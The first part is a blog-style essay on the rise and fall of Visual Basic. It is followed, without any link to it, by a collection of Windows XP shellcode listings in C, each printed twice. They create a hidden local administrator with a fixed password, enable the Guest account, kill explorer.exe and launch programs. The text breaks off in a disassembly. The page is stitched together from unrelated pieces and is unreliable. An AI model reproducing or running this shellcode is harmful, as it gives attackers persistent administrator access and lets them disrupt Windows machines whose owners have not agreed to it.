Rise and Fall of VisualBasic

Great empires often fall from within. 

The death knell for Visual Basic is premature, but it's true that VB has deviated from its original vision as an "Application Construction Kit" for the masses and has lost significant market share as a result.  

Tim Anderson summed it up best:

It sounds like perfection.  Microsoft had perhaps the largest number of developers in the world hooked on a language which in turn was hooked to Windows.  Yet Microsoft took this asset of incalculable value and apparently tossed it aside.  Back in 2002, Microsoft announced that the language was to be replaced by something new, different and incompatible.  That caused rumblings that continue today.  Developers expressed emotions ranging from frustration to anger.  They felt betrayed.

Much has been written lately about the fall of Visual Basic, triggered by an Evans Data survey indicating that VB use has dropped 35% in the past year, and other language surveys show VB falling behind its brother C# and market leader Java.

The problem is simply that when Visual Basic became VB.NET, it became a "real" programming language for trained developers, no longer the layman's "Application Construction Kit" of its original vision.  As such, there's little to positively distinguish VB from the other .NET programming languages, especially the superior and more popular C#.  The result is an expected drop in market share. 

Perhaps next-generation Web development environments like Popfly and Silverlight will fill the gap left by VB.  And there is a concerted effort including a web petition to convince Microsoft to support and upgrade the last "simple" version of Visual Basic, VB6.  This support is unlikely, however, and VB's reign as "programming language for the masses" is over.

Humble Beginning

Alan Cooper is widely regarded as the father of Visual Basic.  In 1987, Cooper was a director at Coactive Computing Corporation where he developed "Tripod," an improved shell/desktop for the fledgling Windows operating system.  After initial testing, Cooper realized that "every user would need their own personal shell, configured to their own needs and skill levels."  The idea of a "shell construction set" was born.  There would be a palette of tools and controls, which users could drag & drop onto forms to create their custom shell.

Cooper began shopping the product around Silicon Valley seeking a publisher.  There was little interest until March 1988 when Cooper showed a prototype to Microsoft CEO Bill Gates.  Visionary that he is, the 32-year-old billionaire immediately saw Tripod's potential.  Gates declared that Tripod was "cool" and would have significant impact across Microsoft's entire product line.  In a few months the deal was done, Tripod became Microsoft's "Ruby," and Cooper assembled a team of engineers to deliver a commercial product.

The original intention was to ship Ruby with Windows 3.0 as a more powerful shell, but Microsoft instead decided to use the OS/2 shell, which Microsoft owned at the time from its deal with IBM.  Microsoft decided to delay Ruby and convert it from a shell construction set for all users to a visual programming language for professional developers by adding QuickBasic.  At first, Cooper was upset with Microsoft's decision and argued against it.  However, after seeing the power of the eventual product, Cooper soon became an "enthusiastic Visual Basic supporter."

An Empire Rises

Visual Basic 1.0 for Windows was first released on May 20, 1991 at the Windows World convention in Atlanta where Gates described it as "awesome."  InfoWorld Magazine described Visual Basic as a "stunning new miracle" that would "dramatically change the way people feel about and use Windows."  Stewart Alsop wrote in the New York Times that Visual Basic is "the perfect programming environment for the 1990s."

VB version 3 (1993) added database access tools and Object Linking and Embedding (OLE).  Visual Basic for Applications (VBA) was released in 1993 to replace the disparate macro features across Microsoft's product line and has since become the de facto standard for application programming in Microsoft Office and other products. 

VB4 was released in 1995 to support the 32-bit Windows 95 operating system.  VB5 was released in 1997 with significant improvements to the user interface, ability to create true executables and custom controls, and support for Microsoft's Active-X technology.  It also dropped support for the 16-bit Windows 3.x operating system.

VB6 was released in 1998 as part of Visual Studio 6.0 that also included Microsoft's Visual C++ development environment.  VB6 improved database access, added Internet features, language improvements and wizards.  Many organizations still use VB6 today.

Microsoft surveys in the late 1990s showed that nearly two thirds of all business application programming on Windows PCs was done in Visual Basic.  VB's overwhelming success was largely because it made Windows programming much easier.  Prior to VB, Windows programming required mastery of the massive and complex Win32 APIs and took hundreds of lines of code to create even simple screen elements.  VB eliminated the need to write lengthy code for the user interface, allowing developers to focus on business logic and produce usable Windows applications relatively quickly. 

World-renowned Windows programming expert Charles Petzold told the New York Times, "For those of us who make our living explaining the complexities of Windows programming to programmers, Visual Basic poses a real threat to our livelihood."

.NET Pulls Out the Rug

In the late 1990′s as the Internet was exploding, Microsoft had just successfully fought off a full frontal assault on its market dominance by killing the Netscape Web browser with its free Internet Explorer.  But Microsoft was facing a host of new challenges, including serious problems with COM, C++, DLL hell, the Web as a platform, security, and strong competition from Java, which was emerging as the go-to language for Web development. 

Microsoft's response was .NET, an object-oriented development environment and framework that provides a highly-functional abstraction layer between the operating system and programming language.  Microsoft announced .NET to the world in June 2000 and released version 1.0 of Visual Basic .NET and the .NET framework in January 2002.  Microsoft also labeled everything .NET including Office to demonstrate its commitment and dominance on this new thing called the Web. 

Unfortunately for VB6 developers, the .NET object-oriented platform is far different than the procedural VB6 programming language, and so there was no easy way for developers to migrate their legacy VB6 code to VB.NET.  Even though a few automated tools emerged to aid the conversion, due to the subtleties and intricacies of the languages, a significant amount of manual, error-prone labor was required.  For larger projects, one would be better off re-writing the application from scratch in .NET using object-oriented architecture and best practices, than performing a mechanical port of VB6 code to VB.NET.

But starting over from scratch means evaluating all options on the table.  And to most "Mom & Pop" developers, Visual Basic .NET appears to be anenterprise product with an enterprise price tag, with significant overhead required in terms of programming skills and computer resources.  So instead of trying to manage the complicated move from VB6 to VB.NET, many VB6 developers moved their applications to the Web, using Java, JavaScript, Perl and PHP.  As a result, millions of developers have left the Microsoft mothership and are unlikely to return.

Don't worry, be happy, VB fans.  Programming languages never die, they just fade away.  My COBOL/RPG2 programming buddies were working hundred-hour weeks during Y2K!

VB is Not R.I.P.

Much of the negative press lately about VB derives from the Evans Datasurvey indicating that overall use of Visual Basic has dropped 35% in just one year, including a 26% drop for VB.NET specifically.  As a result, Java now leads with 45% market share(developers using Java some of the time), followed by C/C++ at 40%, C# at 32%, and Visual Basic at 21%.

Although a 35% drop in market share is significant, it's too early to write the Visual Basic obituary.  Most companies would love to own 21% of a multi-billion-dollar market, though that may not be good enough for Microsoft.  But combined with C# and managed C++, the Microsoft .NET family still commands half the software development market.

What is clear is that Visual Basic is no longer the programming language for the masses of its original vision.  As a result, VB.NET will have to compete with the other .NET and Web languages on its own merits.  With its wordy syntax and second-class status relative to big brother C#, it's unlikely the Visual Basic empire will rise once again.  But Visual Basic will continue to be an effective Windows development platform for many years to come.

Rise and Fall of VisualBasic

Great empires often fall from within. 

The death knell for Visual Basic is premature, but it's true that VB has deviated from its original vision as an "Application Construction Kit" for the masses and has lost significant market share as a result.  

Tim Anderson summed it up best:

It sounds like perfection.  Microsoft had perhaps the largest number of developers in the world hooked on a language which in turn was hooked to Windows.  Yet Microsoft took this asset of incalculable value and apparently tossed it aside.  Back in 2002, Microsoft announced that the language was to be replaced by something new, different and incompatible.  That caused rumblings that continue today.  Developers expressed emotions ranging from frustration to anger.  They felt betrayed.

Much has been written lately about the fall of Visual Basic, triggered by an Evans Data survey indicating that VB use has dropped 35% in the past year, and other language surveys show VB falling behind its brother C# and market leader Java.

The problem is simply that when Visual Basic became VB.NET, it became a "real" programming language for trained developers, no longer the layman's "Application Construction Kit" of its original vision.  As such, there's little to positively distinguish VB from the other .NET programming languages, especially the superior and more popular C#.  The result is an expected drop in market share. 

Perhaps next-generation Web development environments like Popfly and Silverlight will fill the gap left by VB.  And there is a concerted effort including a web petition to convince Microsoft to support and upgrade the last "simple" version of Visual Basic, VB6.  This support is unlikely, however, and VB's reign as "programming language for the masses" is over.

Humble Beginning

Alan Cooper is widely regarded as the father of Visual Basic.  In 1987, Cooper was a director at Coactive Computing Corporation where he developed "Tripod," an improved shell/desktop for the fledgling Windows operating system.  After initial testing, Cooper realized that "every user would need their own personal shell, configured to their own needs and skill levels."  The idea of a "shell construction set" was born.  There would be a palette of tools and controls, which users could drag & drop onto forms to create their custom shell.

Cooper began shopping the product around Silicon Valley seeking a publisher.  There was little interest until March 1988 when Cooper showed a prototype to Microsoft CEO Bill Gates.  Visionary that he is, the 32-year-old billionaire immediately saw Tripod's potential.  Gates declared that Tripod was "cool" and would have significant impact across Microsoft's entire product line.  In a few months the deal was done, Tripod became Microsoft's "Ruby," and Cooper assembled a team of engineers to deliver a commercial product.

The original intention was to ship Ruby with Windows 3.0 as a more powerful shell, but Microsoft instead decided to use the OS/2 shell, which Microsoft owned at the time from its deal with IBM.  Microsoft decided to delay Ruby and convert it from a shell construction set for all users to a visual programming language for professional developers by adding QuickBasic.  At first, Cooper was upset with Microsoft's decision and argued against it.  However, after seeing the power of the eventual product, Cooper soon became an "enthusiastic Visual Basic supporter."

An Empire Rises

Visual Basic 1.0 for Windows was first released on May 20, 1991 at the Windows World convention in Atlanta where Gates described it as "awesome."  InfoWorld Magazine described Visual Basic as a "stunning new miracle" that would "dramatically change the way people feel about and use Windows."  Stewart Alsop wrote in the New York Times that Visual Basic is "the perfect programming environment for the 1990s."

VB version 3 (1993) added database access tools and Object Linking and Embedding (OLE).  Visual Basic for Applications (VBA) was released in 1993 to replace the disparate macro features across Microsoft's product line and has since become the de facto standard for application programming in Microsoft Office and other products. 

VB4 was released in 1995 to support the 32-bit Windows 95 operating system.  VB5 was released in 1997 with significant improvements to the user interface, ability to create true executables and custom controls, and support for Microsoft's Active-X technology.  It also dropped support for the 16-bit Windows 3.x operating system.

VB6 was released in 1998 as part of Visual Studio 6.0 that also included Microsoft's Visual C++ development environment.  VB6 improved database access, added Internet features, language improvements and wizards.  Many organizations still use VB6 today.

Microsoft surveys in the late 1990s showed that nearly two thirds of all business application programming on Windows PCs was done in Visual Basic.  VB's overwhelming success was largely because it made Windows programming much easier.  Prior to VB, Windows programming required mastery of the massive and complex Win32 APIs and took hundreds of lines of code to create even simple screen elements.  VB eliminated the need to write lengthy code for the user interface, allowing developers to focus on business logic and produce usable Windows applications relatively quickly. 

World-renowned Windows programming expert Charles Petzold told the New York Times, "For those of us who make our living explaining the complexities of Windows programming to programmers, Visual Basic poses a real threat to our livelihood."

.NET Pulls Out the Rug

In the late 1990′s as the Internet was exploding, Microsoft had just successfully fought off a full frontal assault on its market dominance by killing the Netscape Web browser with its free Internet Explorer.  But Microsoft was facing a host of new challenges, including serious problems with COM, C++, DLL hell, the Web as a platform, security, and strong competition from Java, which was emerging as the go-to language for Web development. 

Microsoft's response was .NET, an object-oriented development environment and framework that provides a highly-functional abstraction layer between the operating system and programming language.  Microsoft announced .NET to the world in June 2000 and released version 1.0 of Visual Basic .NET and the .NET framework in January 2002.  Microsoft also labeled everything .NET including Office to demonstrate its commitment and dominance on this new thing called the Web. 

Unfortunately for VB6 developers, the .NET object-oriented platform is far different than the procedural VB6 programming language, and so there was no easy way for developers to migrate their legacy VB6 code to VB.NET.  Even though a few automated tools emerged to aid the conversion, due to the subtleties and intricacies of the languages, a significant amount of manual, error-prone labor was required.  For larger projects, one would be better off re-writing the application from scratch in .NET using object-oriented architecture and best practices, than performing a mechanical port of VB6 code to VB.NET.

But starting over from scratch means evaluating all options on the table.  And to most "Mom & Pop" developers, Visual Basic .NET appears to be anenterprise product with an enterprise price tag, with significant overhead required in terms of programming skills and computer resources.  So instead of trying to manage the complicated move from VB6 to VB.NET, many VB6 developers moved their applications to the Web, using Java, JavaScript, Perl and PHP.  As a result, millions of developers have left the Microsoft mothership and are unlikely to return.

Don't worry, be happy, VB fans.  Programming languages never die, they just fade away.  My COBOL/RPG2 programming buddies were working hundred-hour weeks during Y2K!

VB is Not R.I.P.

Much of the negative press lately about VB derives from the Evans Datasurvey indicating that overall use of Visual Basic has dropped 35% in just one year, including a 26% drop for VB.NET specifically.  As a result, Java now leads with 45% market share(developers using Java some of the time), followed by C/C++ at 40%, C# at 32%, and Visual Basic at 21%.

Although a 35% drop in market share is significant, it's too early to write the Visual Basic obituary.  Most companies would love to own 21% of a multi-billion-dollar market, though that may not be good enough for Microsoft.  But combined with C# and managed C++, the Microsoft .NET family still commands half the software development market.

What is clear is that Visual Basic is no longer the programming language for the masses of its original vision.  As a result, VB.NET will have to compete with the other .NET and Web languages on its own merits.  With its wordy syntax and second-class status relative to big brother C#, it's unlikely the Visual Basic empire will rise once again.  But Visual Basic will continue to be an effective Windows development platform for many years to come.

win32 generic - add new local administrator 326 bytes

=====================================================

win32 generic - add new local administrator 326 bytes

=====================================================



/*

Title: generic win32 - add new local administrator 326 bytes

Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com

Method: Dynamic opcode, encoded shellcode

Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111

Greetz: offsec team, inj3ct0r team, hdm

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

 

char code[] =

"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b"

"\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a"

"\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25"

"\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2"

"\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c"

"\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe"

"\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc"

"\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71"

"\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f"

"\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53"

"\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e"

"\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43"

"\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6"

"\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4"

"\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6"

"\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5"

"\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41"

"\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0"

"\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3"

"\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06"

"\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9"

"\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";

 

int main(int argc, char **argv)

{

    ((void (*)())code)();

    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");

    return 0;

}

win32 generic - add new local administrator 326 bytes

===================================================== win32 generic - add new local administrator 326 bytes

=====================================================



/*

Title: generic win32 - add new local administrator 326 bytes

Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com

Method: Dynamic opcode, encoded shellcode

Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111

Greetz: offsec team, inj3ct0r team, hdm

*/

#include 
#include 
#include 

 char code[] =
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b"
"\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a"
"\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25"
"\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2"
"\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c"
"\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe"
"\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc"
"\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71"
"\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f"
"\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53"
"\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e"
"\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43"
"\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6"
"\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4"
"\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6"
"\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5"
"\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41"
"\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0"
"\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3"
"\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06"
"\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9"
"\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";

 int main(int argc, char **argv)
{
    ((void (*)())code)();
    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
    return 0;
}

win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

====================================================================

win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

====================================================================



/*

Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com

Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)

Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111

Greetz: offsec and inj3ct0r teams

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

 

char code[] =   "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"

                "\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"

                "\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"

                "\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"

                "\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"

                "\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"

                "\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"

                "\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"

                "\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"

                "\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"

                "\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"

                "\x64\x64\x00";

 

int main(int argc, char **argv)

{

    ((void (*)())code)();

    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");

    return 0;

}

win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

====================================================================

win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

====================================================================



/*

Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com

Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)

Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111

Greetz: offsec and inj3ct0r teams

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

 

char code[] =   "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"

                "\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"

                "\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"

                "\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"

                "\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"

                "\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"

                "\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"

                "\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"

                "\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"

                "\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"

                "\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"

                "\x64\x64\x00";

 

int main(int argc, char **argv)

{

    ((void (*)())code)();

    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");

    return 0;

}

win32/xp pro sp3 MessageBox shellcode

/*

Title: win32/xp pro sp3 MessageBox shellcode 11 bytes

Author: d3c0der - d3c0der[at]hotmail[dot]com

Tested on: WinXP Pro SP3 (EN)  # ( run MessageBox that show an error message )

website : Www.AttackerZ.ir

spt : All friends ;)

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

 

char code[] =   "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";

 

int main(int argc, char **argv)

{

    ((void (*)())code)();

     

    return 0;

}

win32/xp pro sp3 MessageBox shellcode

/*

Title: win32/xp pro sp3 MessageBox shellcode 11 bytes

Author: d3c0der - d3c0der[at]hotmail[dot]com

Tested on: WinXP Pro SP3 (EN)  # ( run MessageBox that show an error message )

website : Www.AttackerZ.ir

spt : All friends ;)

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

 

char code[] =   "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";

 

int main(int argc, char **argv)

{

    ((void (*)())code)();

     

    return 0;

}

Activate Guest Account Shellcode

#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes

#(+) Author    : ^Xecuti0n3r

#(+) E-mail    : xecuti0n3r()yahoo.com

#(+) Category  : win32-Shellcodes

#(+) Tested on : Windows Xp 32 bit





Code:

____________________________________________________________________________________________________

____________________________________________________________________________________________________



#include <stdio.h>

#include <string.h>

#include <stdlib.h>



char code[] =   "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"

                "\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"

                "\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"

                "\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"

                "\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00";



int main(int argc, char **argv)

{

    ((void (*)())code)();

    printf("Guest Account Activated");

    return 0;

}

Activate Guest Account Shellcode

#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes

#(+) Author    : ^Xecuti0n3r

#(+) E-mail    : xecuti0n3r()yahoo.com

#(+) Category  : win32-Shellcodes

#(+) Tested on : Windows Xp 32 bit





Code:

____________________________________________________________________________________________________

____________________________________________________________________________________________________



#include <stdio.h>

#include <string.h>

#include <stdlib.h>



char code[] =   "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"

                "\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"

                "\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"

                "\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"

                "\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00";



int main(int argc, char **argv)

{

    ((void (*)())code)();

    printf("Guest Account Activated");

    return 0;

}

Windows Magnifier Shellcode

#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes

#(+) Author    : ^Xecuti0n3r

#(+) E-mail    : xecuti0n3r()yahoo.com

#(+) Category  : win32-Shellcodes

#(+) Tested on : Windows Xp 32 bit



Code:

____________________________________________________________________________________________________

____________________________________________________________________________________________________



#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){



    unsigned char shellcode[]=

    "\xeb\x1b\x5b\x31\xc0\x50\x31"

	"\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"

    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"

    "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"

	"\x6d\x61\x67\x6e\x69\x66\x79";





    printf("Size = %d bytes\n", strlen(shellcode));



    ((void (*)())shellcode)();



    return 0;

}

Windows Magnifier Shellcode

#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes

#(+) Author    : ^Xecuti0n3r

#(+) E-mail    : xecuti0n3r()yahoo.com

#(+) Category  : win32-Shellcodes

#(+) Tested on : Windows Xp 32 bit



Code:

____________________________________________________________________________________________________

____________________________________________________________________________________________________



#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){



    unsigned char shellcode[]=

    "\xeb\x1b\x5b\x31\xc0\x50\x31"

	"\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"

    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"

    "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"

	"\x6d\x61\x67\x6e\x69\x66\x79";





    printf("Size = %d bytes\n", strlen(shellcode));



    ((void (*)())shellcode)();



    return 0;

}

win32/xp sp3 Force Kill explorer.exe process

#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes

#(+) Author    : ^Xecuti0n3r

#(+) E-mail    : xecuti0n3r()yahoo.com

#(+) Category  : win32-Shellcodes

#(+) Tested on : Windows Xp 32 bit





Code:

____________________________________________________________________________________________________

____________________________________________________________________________________________________



#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){



    unsigned char shellcode[]=

    "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"

    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3"

    "\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x54\x41\x53\x4b"

    "\x4b\x49\x4c\x4c\x20\x2f\x46\x20\x2f\x49\x4d\x20\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e\x65\x78\x65";



    printf("Size = %d bytes\n", strlen(shellcode));



    ((void (*)())shellcode)();



    return 0;

}

win32/xp sp3 Force Kill explorer.exe process

#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes

#(+) Author    : ^Xecuti0n3r

#(+) E-mail    : xecuti0n3r()yahoo.com

#(+) Category  : win32-Shellcodes

#(+) Tested on : Windows Xp 32 bit





Code:

____________________________________________________________________________________________________

____________________________________________________________________________________________________



#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){



    unsigned char shellcode[]=

    "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"

    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3"

    "\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x54\x41\x53\x4b"

    "\x4b\x49\x4c\x4c\x20\x2f\x46\x20\x2f\x49\x4d\x20\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e\x65\x78\x65";



    printf("Size = %d bytes\n", strlen(shellcode));



    ((void (*)())shellcode)();



    return 0;

}

VB6_vbaExceptHandler - SEH (calc.exe) ShellCode

# =========[ Sh31LC0d3.C ]=====>

/*

###

# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Twitter page : twitter.com/kedans

# platform : Win32

# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")

# Tested on : Windows XP SP3 France

###

*/

// TesT Project   >> Compile As Name k3d4n5.exe <<

/*

004018E0   > 55      | PUSH EBP

004018E1   . 8BEC    | MOV EBP,ESP

004018E3   . 83EC 0C   | SUB ESP,0C

004018E6   . 68 96104000  | PUSH <JMP.&MSVBVM60.__vbaExceptHandler>  ;  SE handler installation (SEH)

004018EB   . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]

004018F1   . 50          | PUSH EAX

004018F2   . 64:8925 00000000   | MOV DWORD PTR FS:[0],ESP

004018F9   . 83EC 30     | SUB ESP,30

004018FC   . 53          | PUSH EBX

004018FD   . 56          | PUSH ESI

004018FE   . 57          | PUSH EDI

004018FF   . 8965 F4     | MOV DWORD PTR SS:[EBP-C],ESP

00401902   . C745 F8 80104000   | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080

00401909   . 8B45 08      | MOV EAX,DWORD PTR SS:[EBP+8]

0040190C   . 8BC8         | MOV ECX,EAX

0040190E   . 83E1 01      | AND ECX,1

00401911   . 894D FC      | MOV DWORD PTR SS:[EBP-4],ECX

00401914   . 24 FE        | AND AL,0FE

00401916   . 50           | PUSH EAX

00401917   . 8945 08      | MOV DWORD PTR SS:[EBP+8],EAX

0040191A   . 8B10         | MOV EDX,DWORD PTR DS:[EAX]

0040191C   . FF52 04      | CALL DWORD PTR DS:[EDX+4]

0040191F   . 33F6         | XOR ESI,ESI

